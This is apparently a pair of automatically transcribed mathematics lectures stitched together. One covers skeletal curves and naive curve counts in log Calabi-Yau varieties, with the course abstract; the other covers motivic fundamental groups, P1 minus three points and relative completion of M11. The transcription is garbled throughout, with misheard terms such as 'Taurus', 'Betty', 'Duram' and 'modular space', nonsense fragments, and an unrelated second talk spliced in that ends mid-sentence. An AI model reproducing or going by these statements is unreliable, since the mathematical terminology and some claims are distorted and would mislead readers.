to the Dlingman for the compactification with this modular space of extended tropical curves. Okay. Thanks. They are really natural objects when we consider compactification. Yeah, so we have our nodal metric tree. And it's just a point in this modular space of tropical curves. So by this homomorphism, we obtain a point in the skeleton of M zero and recall, we have our natural map phi I from the modular space of analytical curves to the modular space of domain times our local bio inside we have a product of skeletons. And then we have a point gamma in the skeleton of the first factor. And we also have the point H V I. So in this picture, it's just this point H of V five. We also have this point in the skeleton of you. So the pair together gives a point in the target. And now we just take the pre image by phi of this point in the target. And by the skeletal curve zero, the pre image is just a finite set and consists of only skeletal curves. But now we have a finite set and not all curves inside this finite set are good. So we further restrict to a subset F I H beta consisting of stable maps whose spine is equal to H. So this subset, this set by inverse, it just says that our curve has the correct domain and the internal market point I P I maps to the correct place. That's all. It doesn't say anything about the spine. That's why we consider a subset with the right span. And then the count. And I H beta that we want that was our goal. We want to define we just let it be the length of this. This subset considered as a zero dimensional analytic space, because probably we have some new potents or multiplicities. If we pass to a big enough infinite. If we pass to a big enough. algebraic collusion if we pass to an algebraic collusion, then it's enough to take just the cardinality of this set. So we define the count and I H beta to be this lens. And I H beta just means the number of skeletal curves. Associated to the spine H curve class beta. And by evaluating at the ice marked point. So intuitively this number counts this purple rational curves close the rational curves with the given spine given red spine. And the more generally we consider also non extended the spice. Sometimes we call it truncated the spice. In other words, we allow some one way lent a vertices VJ to be finite. So the idea is to use toric tail condition to define the counts associated to truncated the spice as in the first lecture. Here is the picture we have skeleton of our local bio and we consider a truncated a spine. So here the vertices V1 V3 V4 they are finite vertices and V2 and V5 they remain infinite vertices. And in order in order to count the skeletal curves associated to such a spice. We recall that we have a Taurus inside you with co character lattice M. And this implies that the essential skeleton of you is equal to the essential skeleton of the Taurus and is homomorphic just to M tensor with R, R and. And now we can extend the truncated the spine. This truncated the spine H together with curve classes and we obtain an extended the spine H hat and then extended curve class beta hat. So I wrote since regarding curve classes in blue just to mean that you can ignore it. If you are not familiar with the theory, they are more auxiliary. So we can just focus on the spine. So we apply the constructions above. We apply the constructions above to this extended spine H hat and extended curve class beta hat. We obtain a finite set. F I H hat beta hat as above consisting of closed curves with spine H hat. And now we consider subset. A further subset satisfying the Tauric tail condition. We ask each punctured tail disk to lie inside our Taurus. So then we are ready finally to define our account associated to such a truncated spine to be simply the length of this subset considered as a zero dimensional analytic space. So intuitively this number just accounts this kind of open curves with given spine. And by open we mean curves with boundaries. So that's the definition of our naive counts. And we have the following theorem concerning this number, this counting number. So assume the spine H is in the general position. More precisely, we assume H is transferred to walls inside the skeleton of you. So I will introduce the notion of walls in the next lecture. Here, let's just imagine that H is in some general position. And then the count H I N I H beta, meaning the number of skeletal curves associated to the spine H and the curve class beta. By evaluating at the eye's mark point is independent of the choice of the internal mark point I and the nor of the choice of the Taurus inside. So remark the independence on I used to be called the symmetry zero and had a tricky proof of our deformation in variance. Now we have a much more conceptual proof via skeletal curves and let me sketch below. So that shows another application of skeletal curves. We can get a conceptual understanding of this independence of the choice of the mark point where we evaluate. If there are any questions you can ask. Otherwise, I'll just go to the proof of the symmetry zero. Yeah, so let me explain the symmetry theorem by skeletal curves. So the symmetry theorem is just the independence of our count on the choice of the place, the point where we evaluate. I mean, if you think why this is true, it's not really obvious because we evaluate at an internal marked point I. And we want to show that it doesn't depend on the choice of this internal marked point. So maybe we want to move if we have two different places where we evaluate, maybe we want to move from one place to another. But the trouble is that when we move from one place to another, at some point we will across some walls and the spine is no longer transverse. So this kind of deformation invariance no longer holds if we move across the walls. In general, we will have some wall crossing formula if we go through move across some walls. And here the way we want to show by skeletal curves is that we can actually move through the walls if it is a skeletal curve. So let me give more details. So the idea is to move from one place to another in the skeletal curve setting. And in that setting we can go through the walls without some complicated wall crossing formula. Yeah, so let's recall the setting from the proof of the skeletal curve theorem. We have a home scheme parametrizing maps from domain curve C to the target Y. And we consider a subspace consisting of maps with given intersection pattern with the boundary and also some given class beta. And we also had this natural maps. We have universal curve to projections. Universal curve is just a product. And we have the natural map phi. First factor is just projection to C. Second factor is the universal map. And on Y we have volume from omega and on H by deformation theory we produced a volume from omega H. For any point F in H we denote CF the fiber of the universal curve at H and we denote the map induced map again by F because that's what F means. So recall from the proof of the skeletal curve theorem F being skeletal is equivalent to F lies in the skeleton of H associated to the volume form. And phi X lies in the skeleton of the target if and only if F lies in the skeleton of H and X lies in the skeleton of the fiber. So that is what we have shown. The main point in the proof of the skeletal curve theorem. If you're confused about the rest just. Yeah, no, you can't formally write F license. F of curve license. F is a map. F is a map but F is also a point of the space of map. Ah, H. Ah, yes, sure. Sorry. Yeah, so F is also is a map but it's also a point in the space of maps. Oh, okay. Sorry. Yeah, so here we really showed that F as a map is skeletal if and only if F as a point lies in the skeleton. So that's what. Okay, okay. Yeah. So now we assume F to be skeletal. In other words, we assume the point a court associate to the map is lies in the skeleton. So we have a canonically associated a spine. Which is just given by restriction H restricted to the skeleton of the fiber, which is the same as skeleton of the curve. So it maps to the skeleton of you. So that's all what we have done in the proof of the skeletal curve theorem. Now let Delta denote the graph of the spine H. And here we make a claim. Assume that the spine H is in general position. In other words, assume it is transverse to walls. Then the skeleton of the fiber CF inside the pre image by five of Delta is a connected component. So recall from this equivalence or recall from just from the fact that the whole skeleton of the curve lies in the skeleton of you. The skeleton of this fiber. Just lies in the free image and we claim that this subset is a connected component. So I drew a picture for your understanding. Recall that our natural map by goes from the universal curve C times H to C times y. And we have the graph of the spine Delta inside this target C times y and we have five going from C times H. So this is C times H. H is the base, the space of maps and every fiber and this total space is product C times H. Every fiber is a curve C. So if we take pre image by five of Delta by the finiteness of five, we obtain some graph inside the product C times H. We obtain some graph. So this fiber, the skeleton of this fiber CF, it lives inside the pre image because this goes to the skeleton as we have a skeletal curve, but we also have some other pieces. And the claim says that this fiber is actually a connected component. They do not, it doesn't touch with other fibers. So it's not difficult to see that to show the claim. First, by the equivalence star, we see that this fiber, the skeleton of fiber is equal to the fiber of the pre image to the fiber of the pre image over F. So this implies that since it's a fiber and the fiber is always closed. So this implies that the inclusion is closed. And we are left to prove that the inclusion is open. And we suppose the contrary. We pick some. But suppose the contrary, we pick a germ of a pass like this green germ starting from the fiber, the skeleton, this skeleton of fiber, we pick a germ of pass zero epsilon going to the pre image by five of Delta starting from this fiber and then goes out. And we can. So since the image of by five of this alpha lies in this product. We can write it right alpha as a two components qtft. Maybe I should say that since. So, since we have shown that the pre image of five. So alpha is a germ of pass in the pre image by five, but we have shown that the pre image of five is just the product of. And we can write it as a skeleton of C and the skeleton of H so we can write alpha as two components qtft qt is some point on the curve and ft is some points in the modular space of maps. And we denote since everything is a schedule here, we denote by ht the spine of ft. And we observe that the condition that alpha lies in the pre image by five of Delta or five alpha lies in Delta and the delta being the graph of H zero. This just implies that ht of qt is equal to h zero of qt. So we have qt fixed a fixed point on our curve and it implies that for this small deformation of our map H. The image of this point doesn't move. And then by the continuity of tropicalization from ft to ht and the rigidity of transverse spines. This I will give more details in the next lecture. We deduce immediately that this equality must imply that ht is constant. In other words, there is no way to perturb ht. No way to to perturb the spine while keeping this equality. So intuitively it's very simple. We have a spine and we have a fixed point qt and we fix the image of that point. Then if this spine is transverse towards, we cannot move this spine. It's just fixed at that point. In other words, this ht is constant. And if ht is constant, it means that qtft lives in the preimage of this fixed point q zero h zero q zero for nat. And that is a contradiction to the quasi-phynatness of the map phi. So I said that by deformation theory, generically over the target, phi is a finite atow. So in particular, it's quasi-phynat. But here we just produced infinitely many. We just produced a germ in the preimage by phi of some point. And that's a contradiction. So that completes the proof of the claim. Yeah, and the claim produces us this nice connected component. So let's just, I just explained the proof of the claim, but let us recapitulate what is the statement of the claim. So we have our natural map of phi from c times h to c times y on. And we have a skeletal curve. We have a skeletal curve f from c to y on. And we assume that the associated spine is transverse. Then the claim says that the skeleton of the fiber cf inside the preimage by phi of the graph of h is a connected component. And now observe the following. First, observe that the first factor of phi decides exactly where we evaluate for the second factor. The second factor of phi is universal map. And the first factor of phi is the projection to c. So the first factor determines where we are evaluating for the second map. And furthermore, observe that if we take some of the degree of our map of phi restricted to this skeleton fiber. And here, the degree makes sense exactly by the claim, because we know that the map of phi is finite at all, generically over the target. So the degree makes sense. But, but if we restrict to a subset, the degree may no longer make sense. And here it still makes sense because we restrict this finite at all map to some connected component. And then the degree is still well defined because the map remains to be finite at all over some sickening of this connected component, some neighborhood. So the degree makes sense, and we take the degree and we take a sum of such degrees over all skeletal curves whose associated spine is equal to h. And that is exactly the counts, the following count. And w hw beta, where we count the number of skeletal curves associated to the spine hw, which is just the spine h, but we add an internal marked point at w, meaning that we add some internal lag at w, which is contracted the lag. And then we consider the count of skeletal curves associated to this augmented spine and the curve class beta by evaluating at the added marked point, w. And the left hand side is equal to the right hand side by the definition of this count. So now we can conclude the symmetry theorem for transverse spine, the count. Now we see that the count and h beta is independent of the choice of the internal marked point. Because here we see that the left hand doesn't depend on the choice of w. And the right hand side is the count of skeletal curves where we evaluate at this point w, and w is allowed to move everywhere. So the count is invariant when we move w anywhere along the spine. And this shows the symmetry theorem. Furthermore, we can show that adding or removing internal marked points does not affect the counts at all. So this is an illustration of how we use skeletal curves for establishing important properties of our counts. And we will see further examples of that in later parts of the lectures. So here for the symmetry property, symmetry theorem, actually we can have different proofs without passing through skeletal curves. But for other properties, we must use skeletal curves. And here it's nice to see that using skeletal curves, we really have the freedom of moving the point w everywhere. Without using, without if the curve is not skeletal, there's no way to cross a wall while keeping the invariance. And as a proof of the symmetry theorem, we don't move across the wall if we don't use skeletal curves. So that's what I want to explain today. And for the next lecture, I will talk about the deformation invariance, which is, and also many other properties of the counts. That finally leads to the proof of the associativity of the mirror algebra. And for deformation invariance, as we said, usually it only holds outside walls. When we cross a wall, we are supposed to have wall crossing formula. We no longer expect deformation invariance. But for skeletal curves, actually, there is some trickier deformation invariance that somehow similar to this situation about moving around this market point across walls. For skeletal curves, we can actually move across walls a little bit as long as it's sufficiently transverse, but not really transverse. For non-skeletal curves, it must be transverse in order to have deformation invariance. But for skeletal curves, we can relax a little bit the transversality condition. And that's actually important in the proof of associativity and also in the proof of wall crossing formula. Because in associativity, I mean the definition of structure constants, if you remember from the last lecture, the place we evaluate, we ask the point to go to Q. And the Q is, although it's a very generic point at the level of analytic geometry, it's a very special point at the level of tropical geometry. So all the spans that appear in the definition of structure constants as in the previous lecture, they are all very special. They are not transverse at all. So in order, and of course we can make them transverse if we don't ask the marked point to go to Q, but to go to some place, to go to some point sufficiently close to Q. But then we will have the choice of asking it to go to either the left of the wall or the right of the wall. Or if there are many more walls, then we have even many more choices of chambers. But in general, we have the choice of asking it to go to the left or go to the right. And it's not clear at all whether the structure constants for the marked point going to the left is equal to the structure constants for the marked point going to the right. And this going from left to right across in the wall, we have to use the theory of skeletal curves again. So I will explain more about that in the next lecture, the next month. Thank you very much for your attention. Thank you very much. And maybe you have time for, maybe I don't have time for the questions. Actually, I have a very simple question. You have this variety H, which has the same dimension as Y. It also has logarithmic volume form here. But is it, yeah, so it means that you can start to reproduce from some local abbey or another local abbey or in a sense. And does this H contain the toss again if you assume that Y contains the toss? This H. This H is a cover of the toss. Probably it's not a toss. It could be more. H is really the modular space. So, yeah, I see. And also, we don't really have a good complication of H. So it's not local abbey or it's a chromified cover. Yeah. It's not clear whether it's not a carabia or not, because we only consider the essential skeleton of H associated to this particular volume form. Yes, yes. Maybe there are other volume forms. Yeah, or maybe this volume form has zeros. It can have zeros or yes. Okay, okay, so thank you.
|
We show that the naive counts of rational curves in an affine log Calabi-Yau variety U, containing an open algebraic torus, determine in a surprisingly simple way, a family of log Calabi-Yau varieties, as the spectrum of a commutative associative algebra equipped with a multilinear form. This is directly inspired by a very similar conjecture of Gross-Hacking-Keel in mirror symmetry, known as the Frobenius structure conjecture. Although the statement involves only elementary algebraic geometry, our proof employs Berkovich non-archimedean analytic methods. We construct the structure constants of the algebra via counting non-archimedean analytic disks in the analytification of U. We establish various properties of the counting, notably deformation invariance, symmetry, gluing formula and convexity. In the special case when U is a Fock-Goncharov skew-symmetric X-cluster variety, we prove that our algebra generalizes, and in particular gives a direct geometric construction of, the mirror algebra of Gross-Hacking-Keel-Kontsevich. The comparison is proved via a canonical scattering diagram defined by counting infinitesimal non-archimedean analytic cylinders, without using the Kontsevich-Soibelman algorithm. Several combinatorial conjectures of GHKK follow readily from the geometric description. This is joint work with S. Keel; the reference is arXiv:1908.09861. If time permits, I will mention another application of our theory to the study of the moduli space of polarized Calabi-Yau pairs, in a work in progress with P. Hacking and S. Keel. Here is a plan for each session of the mini-course: 1) Motivation and ideas from mirror symmetry, main results. 2) Skeletal curves: a key notion in the theory. 3) Naive counts, tail conditions and deformation invariance. 4) Scattering diagram, comparison with Gross-Hacking-Keel-Kontsevich, applications to cluster algebras, applications to moduli spaces of Calabi-Yau pairs.
|
10.5446/50999 (DOI)
|
get other work the minister the th at the Okay, so this is the fourth and final lecture where I try to say all the things that I wish I'd said in early lectures. Unfortunately, I won't talk about mixed modular forms. I didn't get that far and I apologize for that. But I will say a few things that I believe are important and to illustrate what they are and what they mean, I will first motivate with the case of p1 minus 3 points. Even though I don't want to talk about p1 minus 3 points very much at all, I just will write down the key ingredients as I see it in the theory and then I will replicate them or give generalizations of them in the case of M11. So the zero-th section then is motivation for this lecture from p1 minus 3 points. And I'm going to briefly summarize most of the ingredients in the motivic theory and say why they're important. So what we have here is, as I've mentioned this a few times already, we have Betty and Duran fundamental groups. Oh sorry, they're not fundamental groups, they're fundamental torsos of paths because we're going from zero to one. So this is the unipotent completion or the Duran pi1 of p1 minus 3 points from a tangent vector at one to a negative tangent vector of length one at one. And these are schemes over Q and they are connected to each other by comparison isomorphism. So this is a morphism of schemes. And then there's an element that plays a very important role which is the Droschema in the topological fundamental group which is the path, the straight line path going from zero to one or rather the tangent vector of length one at zero to the tangent vector of length minus one at one and it's simply the straight line. Now my line is not very straight. Do that again. So that's the Droschema and it gives an element in Betty fundamental group, its rational points and then we push it across into the Duran fundamental group and its image in the complex points of the Duran fundamental group is the Drinfeld associator. So I've explained that a number of times already. So this is sum over some words in two letters and the coefficients are shuffle regularized, multiple zeta values. And last time we discussed what the analog of this should be in genus one and discussed the analog of relations satisfied which in the case of the Drinfeld associator the hexagon and pentagon equations. Right so then this we've more or less covered. So the next stage in the theory is to make things, is to put in the motivic point of view. So the way that this is done these days in this situation though of course in the early days we didn't have a category of mixtape motive so you want to do something else. But now we say that these schemes are the realizations of something else in the Matic fundamental group. I'll write with a subscript M, Matic fundamental group. So what that means to say that the scheme is a realization of a motive, what it means is that the rather the affine ring, we have an object which we think of as the affine ring of a scheme which is an end object in a category of mixtape motives over the integers. And its Betty realization is the affine ring of the Betty scheme and its Duram realization is the affine ring of the Duram scheme and you have other realizations as well. So this was done by Dylene Gontrov, defined by Dylene Gontrov. Okay so then what do you get from this? Well the next stage in the story is to interpret this. So a motive or an object in an Abelian category or a Tanakian category of motives is simply a vector space plus the action of a group. So the category of mixtape motives because it is a Tanakian category is the same as the representations of a certain affine group scheme that I'm going to write. So the group schemes if I do it correctly and consistently will have curly G's, so the the the motivic Gallo groups will have curly G's whereas all other groups will will will not have a tail so I hope I do that consistently. So a mixtape motive is simply a vector space plus the action of a particular group which is the motivic Gallo group of this category. It's the Duram motivic Gallo group of this category and this function is the is the Duram realization function. So what we're getting then is is some schemes and the extra data of a group MTZ acting on one of them on the Duram one. So we get some object with a group acting on it and this encodes all the motivic theory. Of course you can also place Duram with Betty if you like but there's no loss of information in just restricting to a single fiber functor and Duram is by far and away the most convenient in this story. So the point of this is that the structure of OPI1M as a motive is completely equivalent by the Tanaka theorem to the action of this group on the scheme OPI1 Duram and this in turn is completely equivalent to the action of this group on I'd like to say multiple zeta values but to make this rigorous I have to put little motivic in brackets. So the first point is that this group action really contains all the information it really knows everything that there is to know about PI1 minus 3 or the fundamental group of P1 minus 3 points. Actually when you write topology for the series Betty actually. No so that yeah I skipped this because I did this last time there's a map there's always a map PI1 top I won't repeat the rest goes into the Betty points into the rational points of the Betty and it's a risky dense and the same happens in relative completion so I skip that step when I am. So one the way I prefer to think about this is that this you can imagine that there's a Galois theory of transcendental numbers like multiple zeta values and this the action of this Galois group on these numbers should be so that Galois action is clearly conjectural but you can make it absolutely rigorous by replacing numbers with something called motivic periods and then this action of this group is completely equivalent to an action on the motivic versions of these numbers. So that's something that's quite concrete and is used a lot and the point is that it's all completely encoded in the date of this action and without wishing to give an entire course on this because I've done it before you can deduce a lot of fun things for example to prove results here between multiple zeta values but between periods you just compute numbers so here you can prove them using complex analysis for example and because of this equivalence you can push them back to statements into the actual motive and you can result deduce results about the eladic structure of P1 minus 2 points it's fundamental group and you can deduce results about periodic periods as well. So that illustrates the power of this point of view. Okay so all that to say that this technology of having motivic multiple zetas and hop-algebra or co-algebra structure on them is used all the time but it really comes from this group action. So the key point then is to determine this group action and for me it's one of the most important points in the whole theory. So we need to know how this motivic Galar group acts on 0 pi 1 Dirham. In other words we get a map from this group into the group of automorphisms 0 pi 1 Dirham that's what it means for this group to act on on this scheme and we know that this Galar group satisfies certain constraints it's constrained in some way so it lands in some subgroup of the group of automorphisms that I will just denote with a prime for now since I don't want to go into the whole theory and the key point here is that this subgroup can be described quite explicitly and it turns out actually to be isomorphic as a scheme but not as a scheme because there is no group structure here. It turns out to be isomorphic to the fundamental group itself and what you get from that then something slightly strange you get an action of this pi 1 on itself which exactly reflects the action of the galar group. So this is in some sense this is what's confusing about the theory because in p1 minus 3 points the role of this automorphism group gets confused with the role of the torsive paths and that causes a lot of confusion in the case of m11 you'll see that it's very slightly different. Okay so this was first done by Ihara and it's as I mentioned it's extremely important so we can describe this action the action of this group on pi 1 d'Arem explicitly. So there's an explicit formula perhaps I'll just give it I didn't prepare this so my conventions may be the wrong way around but essentially if you represent this by group like formal power series in two variables then you get an operation on formal power series in two variables which is something like multiplied by f on the left and then you do some non commutative substitution like this. So f and g are functions our group like formal power series in some coefficients in some ring. So you get a very concrete formula this was discovered by Ihara and then from this it's a very short argument to dualize this this is explained in my lecture the ICM proceedings. You dualize this and you get a co-action formula for multiple zeta values essentially, mativic multiple zeta values and we use that all the time. So really the heart is understanding this group action so this implies formula for co-action on mativic mzv's and you can really use this to compute it's actually absolutely extraordinary that this whole philosophy gives anything at all. I feel like saying that the more you understand this the more surprising it becomes that these very general considerations actually give you any information at all but in fact you get an enormous amount of information from this co-action in fact it completely determines all the relations between multiple zetas. So the next stage then is some input from the mativic theory more precisely Borel's Theorem on algebraic k theory tell us something about the size of this mativic Galois group and in fact we know that the the Lie algebra of the unipotent radical of this mativic Galois group or it's associated graded is isomorphic to the freely algebra on generators sigma 3, sigma 5, sigma 7 and so on where sigma 2n plus 1 is in degree minus 2n minus 1 and these are the very famous zeta elements something was called Sule elements graded you can just put if you don't like it you can put the completion of the free Lie algebra on these elements and so these sigmas correspond in some sense to the odd zeta values which in turn control the structure the whole structure of the ring of multiple zeta values through this mechanism. So this controls this Lie algebra controls the structure of mativic mz v's and hence all mz v's. So you get from this I don't want to do the whole course on this but you get upper bounds from for the dimensions of the space of numbers in this way it's very concrete and so the final piece I want to get to is the theorem that I proved a few years ago which was called previously called the Delaney Harrow conjecture which is that this Lie algebra in other words the sigma 3, sigma 5 act freely so let me write a freely algebra as a blackboard L so then this freely algebra obviously acts freely on 0 pi 1 the ram and that implies that in fact that this the pi 1 of p1 minus 3 points in fact generates the whole category of mixed-hate motives over the integers. So now what I want to I really don't want to talk about this but I will repeat all of this for genus 1 and explain how to get a group so we don't have a category of motives in this case but I will explain how to cook up something some category of realizations that will do the job we're going to get a group acting on everything I want to then describe the hod structure underlying the relative completion then I want to describe the automorphisms of this structure and how the Gallo group acts and then I want to explain what the analogs of these sigmas are going to be and I will conclude with a Freeness theorem which is an analog of this result in the case of genus 1. Sorry? It's a conjecture. What I'm going to say later this is a theorem. Oh yeah I'll state a theorem of our state of Freeness theorem generalizes this that involves zeta elements but also modular elements but the caveat is that that's not the whole story that there is an infinite sequence of infinite sequences of generators they're not just modular and zeta elements they're rank and sellberg elements and etc etc etc so that's the issue but it's a story this is a tricky very tricky combinatorial and analytic argument it uses some difficult identity due to zaggy between multiple zetas proved by Fragman-Lindelhoff principle and uses a tricky combinatorial argument in the genus 1 situation this theorem is going to pop out without any effort it's just going to pop out of the structure from the description of this group the analog of this group so we'll see that. Okay so now the case m1 1 so this is what we're really interested in and the first point is then as a substitute for motives we're going to work with hot structures so the Betty and Durand completions G11 B and DR have not just a mixed hot structure but a limiting mixed hot structure so this is a new feature that we don't see in genus 0 and it's very important indeed as I will try to explain at the very end so this was computed by Hain defined by Hain and it's very slightly different context but it's equivalent. So what does a limiting mixed hot structure have well it has a geometric weight filtration W but it also has another weight filtration M and the it has a hodge filtration so this is called the monodromy or I might just call it the weight filtration without any adjective and F is the hodge filtration. So the weight filtration as a motive if you like is M it's not W and we think of this as a mixed hot structure with an extra filtration W so how this is going to be encoded so I want to encode this data in the following way that we're going to have some rings OG1 Betty, affine ring, OG11 Durand and there's a comparison isomorphism between them and this is going to be encoded as a W filtered end object of a category H of mixed hot structures which I'm going to define now. So what's going on here is that we've got some local systems or variations of variations over M11 and on those there's a weight filtration W and so you can look at the W end part of that you can stop the filtration at a certain point and you get a variation and when you take the limit you get a genuine mixed hot structure. So the upshot is we get W for each step in the W filtration we get an actual mixed hot structure and there's a lot of extra data that goes into a limit mixed hot structure that I'm going to ignore for now but it will come back very shortly. So the first thing then is to define the category H so that H be a category whose objects are triples consisting of so I think a version of this category was first written down by Deline so VB and VDR are finite dimensional Q vector spaces with an increasing filtration M so my habit is to write W in this context like everybody else but I have to remind ourselves that it's M now weight filtration is denoted by M so if I accidentally write W please stop me. So VDR also has a decreasing filtration F so these are filtration of Q vector spaces and they are finite and exhaustive then C is an isomorphism from between the complexifications of these vector spaces which respects the weight filtration M. There's the data of a real Frobenius which is very useful especially for constructing modular forms I mentioned in the first lecture which I won't have time to do. Since actually I won't need it I'm just going to drop it and put it in brackets and skip that and then the key condition is that the vector space VB equipped with the filtration M and equipped with the filtration F on its complexification is a graded polarizable Q mixed hard structure. There's definition I won't give, it's very well known and it's just some linear algebra conditions on the filtration. And then the morphisms in this category are what you think they are. So morphism is given between a triple is what you think so it's given by linear maps phi B to phi B prime and phi Duran that respects everything. So there's a commutative diagram involving C and C prime that needs to commute. There's a these maps need to respect the M filtration, the F filtration in this case and so on and so forth. So I'll just say that this has to be compatible with the above data. So then this forms an Abelian category. There's an obvious notion of direct sum, there's a notion of dual, a notion of tensor product. So it's a Q linear Abelian tensor category with duals, in other words it's in fact a Tanakian category. So and it comes equipped with two fiber functors, omega-beti or Duran which is a functor from this category to vector spaces, finite dimensional vector spaces over Q and it sends a triple to the corresponding either the the the Beti vector space or the Duran vector space. So that's a fiber functor. That's a neutral Tanakian category over Q and so from this we get a group of course. So we let G, so this is what's going to play the role of a motivic Galois group, it's going to get a curly G, B or DR. There'll be two such groups. It's defined to be the automorphisms of the corresponding fiber functor in this category. So this is an affine group scheme over Q and it plays the role of the motivic Galois group. And in fact in the case of mixtape motives it's no loss to work in a category realizations. The corresponding group acts in an identical way to the motivic Galois group, so it's literally the same thing. Okay so okay so now I want to state a theorem about, I want to put relative completion, view relative completion as an object in this category somehow, so let me remind you briefly that G11, the Beti and DRAM relative completions that we defined are group schemes over Q, affine group schemes. So what that means is that the ring of functions in either case are commutative hopf algebras. That's what it means for this to be an affine group scheme. So in particular there's a lot of data that comes into this but there's a coproduct. Alright so we have a coproduct and other stuff. And the comparison isomorphism then is an isomorphism of hopf algebras. Alright so now what we want to do then is view the affine Beti ring, the affine DRAM ring and this comparison is a triple and it's going to be a triple in this category. I need the border raiser, no there is none. gespannt, Weinhardt and Hoff. Okay, so the theorem then, which is most of the work is contained in the work of Dick Kaine, this is the corollary of Hain's work, that the affine ring of the Betty relative completion has natural filtrations W and M, Duram has natural filtrations W and M and F such that such that O.G. On Betty comp is I'll say it this way then explain a little bit what it means. So this is a W filtered pop algebra object in H rather in object. So what that means slightly more concretely. So this is how we encode this geometric weight filtration. It's just saying that for every N, if we only consider the WN part of these rings, then this is an object in fact an end object, it may be infinite dimensional, maybe sort of a limit of objects in age, but if we take any M, M filtered piece of it, it will be finite dimensional and it is compatible and this structure is compatible with the data that goes into hop falgibor. In other words, these co-products are consistent with all these filtrations and all these structures. So compatible with the hop falgibor structure. So there's more to come for this theorem, a little bit more, but I'm just going to postpone it. We can be a bit more precise about this. Let me pause the theorem for now. So that's already a very quite a tight constraint on the structure of this thing. But something that seems completely trivial, but again is also extremely important, is the local monodromy at the cusp. So I sometimes call this inertia for reasons that will become clear. So the local monodromy at the cusp defines a map from the topological fundamental group of GM, the tangent vector 1 at 0, into topological fundamental group of M11 d by dq, which is just SL2z. So I've drawn this picture already. This is the chart given by the punctured disk. So if we draw the punctured disk d star and remove the origin, then we have the tangent vector of length 1, which is just the same thing as d by dq. And here we have a loop going around the origin in a positive direction. And that gives us, in M11, it gives us a loop around the cusp. And it corresponds precisely to the matrix T, which we studied last time. So essentially we have a copy of the motivic fundamental group of GM, which is a very simple thing, sitting inside relative completion, SL2z. And so this thing is geometric, motivic, if you like. And therefore this homomorphism of fundamental groups actually gives morphisms on the level of completions. Another way to say that is, in fact, by universal properties of completion, relative completion, you deduce that the same is true on the level of B and dr. So we get a map into G11B slash dr. So these are morphisms of group schemes. So how is this encoded? And we want to say that this, a morphism like this, is a morphism compatible with Hodge theory. And the way to say that is, then that somehow this is a morphism in the category H. So I will use that sort of language. But what such a statement means is that on the affine rings, you get a genuine map between objects of H. So to spell that out, this morphism of group schemes translates into a homomorphism of hopf algebra in the opposite direction, and hence a map of triples. So what this means to be a morphism of group schemes in the category H, the definition is that on the affine rings, we're getting a morphism of hopf algebra objects in H. So that's exactly what it means. So this encodes, so in the theory of limiting mixed-hodge structure, there's a very important role played by the nilpotent operator. And this is how it comes into the theory. So it's encoded by the data of a map of the motivic fundamental group of GM into our group scheme. So to make that a little bit more concrete and make the connection, this object is very simple. It's Lie algebra. So I think of this group as a group in H. Then I can take it, it's pro-unipotent, so I can take it's Lie algebra, and its Lie algebra is the Tate object. I mean, it's pro-unipotent, so it's completely determined by its Lie algebra, what I mean. So the Lie algebra is just the Tate object Q of 1, where Q of 1 is, Q of 1 is an object of H, and it's just the object given by the pair of vector spaces Q and Q, and the isomorphism between them sends 1 to 2 pi i inverse. So that's the Tate object. And so if you're familiar with the theory of limiting mixed-hodge structures, what we've got then is just a map on the level of E algebra is we've got a map from Q of 1 into here. And the image of a generator here therefore gives an endomorphism on this. So this encodes the nil-putton operator N, which is also the logarithm, just the logarithm of this path, log T. So T viewed as an element in Betjewel-Durham in the theory of limiting mixed-hodge structures. And this also explains why when last week we computed the periods of relative completion along T's, in other words we computed iterated integrals of modular forms along T, and I explained that they were only involved 2 pi i, powers of 2 pi i, and that's clear from this picture because they pull back to periods of GM, and the only periods of GM are periods of Q of 1, and the period of Q1 is essentially a 2 pi i. So this remark explains, makes it obvious why the periods of T only involve 2 pi i, or the powers of 2 pi i. Okay so in some sense this T thing is trivial, it comes from something that's geometrically very trivial, but the point is that it sits inside relative completion in quite a complicated way. And as I explained last time, that's reflected by the fact that Eisenstein series have a non-trivial zero through coefficient, and that involves Bernoulli numbers. So you can actually, I'm not going to have time to do it, but you can write out what n looks like, the image of n in this, in Betio and Duram, and you get a power series involving Eisenstein generators, Bernoulli numbers, and you also get the peter in a product between cast forms. So it's actually quite a tricky object. And now let me reformulate this local monodomi in a different way again. Another way to set it then is that we've got a map of Duram fundamental groups. So we've got a homomorphism, or morphism of group schemes. And since these are Duram realizations of pro-objects in H, they get an action of this Galois group, G Duram H, is going to act on both of them in a compatible way. So compatibility with this morphism. And that seems very trivial, but it actually gives a huge amount of information on this action of this material Galois group. So before proceeding with the description of this action, I want to write down, remind you of the structure of relative completion, and explain its hodge, explain what these three filtrations look like. It's slightly tricky. So here's a description of the hodge structure, or really rather just the filtrations on the Duram relative completion. So it's much simpler to write things in terms of the Lie algebra. So we'll call that U11 Duram is the radical, the pro-unipotent radical of G11 Duram. And let lowercase U11 Duram be its Lie algebra. So this has a mixed hodge structure as well, and I'm going to describe it. So as I mentioned a few times already, this is isomorphic to the completion of a freely algebra on certain generators, and they were given by Eisenstein series. And for each cusp form there were a pair of generators, EF prime and EF double prime. So we're here F cusp form. So last time we chose a basis of cusp forms with rational coefficients, rational Fourier coefficients. Okay. So these generators are non-canonical. Now briefly we have, so these x's and y's were elements, were basis of a vector space. So everything can be promoted to the category h. So since the beginning of these lectures we've had a betty thing going on, a Duram thing going on, and the bottom line is that everything can just take place in h. So the, in particular this vector space that's been playing a role, Vn, we can now view it as an object in h. And I remind you that Vn Duram was, this vector space of these bold generators x and y. But now we can put a mix, what we gain now is a mix of structure. So these x and y aren't just variables now, they're going to have m and w and f filtrations. So Vn h was defined to be, way back in the first lecture, the symmetric and symmetric power of V1. So I just need to describe the Hodges theory of V1 and in fact V1 of h is, as an object in h, it's simply a direct sum of two tate objects. And y is at the case, so this is a well-known fact that the, if you take the limit, mix of structure on the cohomology of the universal elliptic curve, this is the universal elliptic curve at the fiber, at the point, at the tangential base point d by dq. This has a limiting mix of structure and it's exactly this. Sorry, I think I want homology. If I want, is it plus, plus one, so I want homology. So put another way, that tells us that x, the meaning of the variable x then is that it's a copy of q of zero. So and the meaning of y is that it's going to span a copy of q of one. So in terms of the m and f filtrations, the Hodges numbers with respect to m and f are here zero comma zero. I shouldn't put that, so the Hodges numbers with respect to m and f and here minus one, minus one. And they're both going to sit, we're going to view these, since we're working with w filtered objects in H, we're going to stick these in w equals zero. And then the- X and y form a basis of v1? Yes, yes, x and y form a basis of v1 and the powers of x form a basis of its symmetric power. So exactly x, x is a generator here and y, x is a generator of the diram component of this vector space and y is a generator of the diram component of this vector space. So 